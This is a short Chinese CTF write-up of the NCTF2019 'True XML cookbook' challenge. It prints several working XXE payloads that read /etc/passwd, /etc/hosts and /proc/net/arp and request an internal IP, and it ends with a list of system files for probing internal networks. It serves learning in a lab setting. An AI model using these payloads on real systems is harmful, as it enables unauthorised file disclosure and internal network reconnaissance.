[NCTF2019]True XML cookbook
前几天学了XXE注入,今天试试
进去后是一个登录界面,随便登一下抓包,发现POST那熟悉的XML的格式
拿之前练习的Payload来试试
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
<username>&xxe;</username>
<password>123456</password>
</user>
但是之后这些路径好像都打不开
我们试试利用xxe攻击内网
再读取主机
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
<user>
<username>&xxe;</username>
<password>123456</password>
</user>
返回了一些页面,我们可以在上面看看有哪些存活的主机,但是好像没有
真的没有吗?还是这个不行?我又换了一个试试,结果这一次看到了一台主机
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///proc/net/arp"> ]>
<user>
<username>&xxe;</username>
<password>foo</password>
</user>
我们试着访问一下
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://10.0.233.2"> ]>
<user>
<username>&xxe;</username>
<password>foo</password>
</user>
结果不存在
但是IP的基本格式我们已经知道了,我们试着爆破最后几位
找到flag
知识点:
xxe可以攻击内网,以下是一些攻击内网的payload,先存着,以后用得上再说
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie